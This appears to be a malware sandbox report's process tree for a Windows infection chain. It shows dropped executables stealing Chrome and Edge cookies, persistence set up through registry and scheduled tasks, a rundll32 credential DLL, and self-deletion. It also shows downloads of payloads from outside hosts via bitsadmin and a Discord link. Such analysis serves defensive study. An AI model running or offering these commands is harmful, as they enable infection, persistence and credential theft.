                                                                                                                      • C:\Users\Admin\Documents\AA56UIUReSkqxyq9GrfSRdsj.exe
                                                                                                                        "C:\Users\Admin\Documents\AA56UIUReSkqxyq9GrfSRdsj.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3996
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          7⤵
                                                                                                                            PID:4860
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            7⤵
                                                                                                                              PID:5428
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                                PID:4588
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                7⤵
                                                                                                                                  PID:3216
                                                                                                                              • C:\Users\Admin\Documents\waKUFRcIBFxbZWH249D0sUss.exe
                                                                                                                                "C:\Users\Admin\Documents\waKUFRcIBFxbZWH249D0sUss.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:4820
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im waKUFRcIBFxbZWH249D0sUss.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\waKUFRcIBFxbZWH249D0sUss.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                    7⤵
                                                                                                                                      PID:5784
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im waKUFRcIBFxbZWH249D0sUss.exe /f
                                                                                                                                        8⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:5952
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 6
                                                                                                                                        8⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5512
                                                                                                                                  • C:\Users\Admin\Documents\ZdI1RyVu4IhMklRaaOOkedBI.exe
                                                                                                                                    "C:\Users\Admin\Documents\ZdI1RyVu4IhMklRaaOOkedBI.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4252
                                                                                                                                    • C:\Users\Admin\Documents\ZdI1RyVu4IhMklRaaOOkedBI.exe
                                                                                                                                      C:\Users\Admin\Documents\ZdI1RyVu4IhMklRaaOOkedBI.exe
                                                                                                                                      7⤵
                                                                                                                                        PID:4808
                                                                                                                                    • C:\Users\Admin\Documents\408U_S8BHw4JsnA2EUyk60mk.exe
                                                                                                                                      "C:\Users\Admin\Documents\408U_S8BHw4JsnA2EUyk60mk.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4868
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 764
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:1332
                                                                                                                                    • C:\Users\Admin\Documents\KFdN_yExLiq6zFf1jYgoMyu9.exe
                                                                                                                                      "C:\Users\Admin\Documents\KFdN_yExLiq6zFf1jYgoMyu9.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5084
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 660
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:4972
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 676
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:3004
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 684
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:2284
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 668
                                                                                                                                        7⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:4844
                                                                                                                                    • C:\Users\Admin\Documents\plinbbYd92UTaY2JcUFTY5Lz.exe
                                                                                                                                      "C:\Users\Admin\Documents\plinbbYd92UTaY2JcUFTY5Lz.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:3988
                                                                                                                                      • C:\Users\Admin\Documents\plinbbYd92UTaY2JcUFTY5Lz.exe
                                                                                                                                        "C:\Users\Admin\Documents\plinbbYd92UTaY2JcUFTY5Lz.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:5368
                                                                                                                                      • C:\Users\Admin\Documents\5tMfy3hNLCm5Xo9ZZb0TsGaQ.exe
                                                                                                                                        "C:\Users\Admin\Documents\5tMfy3hNLCm5Xo9ZZb0TsGaQ.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:2316
                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4632
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            8⤵
                                                                                                                                              PID:1460
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                              8⤵
                                                                                                                                                PID:5148
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                8⤵
                                                                                                                                                  PID:5560
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5612
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5952
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6004
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5316
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5428
                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4428
                                                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4688
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                              PID:3004
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6068
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:5788
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4436
                                                                                                                                                              • C:\Users\Admin\Documents\LeBaAU7glU3YnAKg8NlAITUV.exe
                                                                                                                                                                "C:\Users\Admin\Documents\LeBaAU7glU3YnAKg8NlAITUV.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:4324
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:840
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5724
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4820
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:5948
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:1368
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:5168
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5928
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvF84D.tmp\tempfile.ps1"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:2452
                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                PID:5364
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4216
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1468
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 532
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:1492
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:504
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:3688
                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:4000
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4292
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:4880
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_1.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_1.exe" -a
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:2684
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_6.exe
                                                                                                                                                                      sonia_6.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:3440
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2192
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2256
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3764
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1636
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_2.exe
                                                                                                                                                                            sonia_2.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                            PID:1020
                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4192
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                              PID:4228
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\61D3.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\61D3.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4864
                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1896
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\43A8.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\43A8.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1368
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\483D.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\483D.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4408
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\528F.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\528F.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5180
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5908.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5908.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4804
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6108.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6108.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3464
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6723.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\6723.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6024
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\687C.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\687C.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4908
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\687C.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\687C.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4136
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6ADF.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6ADF.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5520
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6DCE.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\6DCE.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2332
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\739B.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\739B.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4692
                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5940
                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4940
                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5496
                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:6032
                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2200
                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4832
                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4132
                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4864
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A75D.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A75D.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:3792
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:5588
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:5648
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:6008
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe" /F
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                    PID:5976
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" C:\ProgramData\ca82a716069a53\cred.dll, Main
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4244
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AC3C.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\AC3C.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2852
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B516.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B516.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5868
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\C102.bat C:\Users\Admin\AppData\Local\Temp\B516.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:6116
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5480
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5592
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C100.tmp\C101.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/871473757104005120/asap.exe" "asap.exe" "" "" "" "" "" ""
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:2336
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\16433\asap.exe
                                                                                                                                                                                                                                                  asap.exe
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:1036
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\mine.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\mine.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:5828
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\91CA.bat C:\Users\Admin\AppData\Local\Temp\mine.exe"
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:4108
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\91C8.tmp\91C9.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:4360
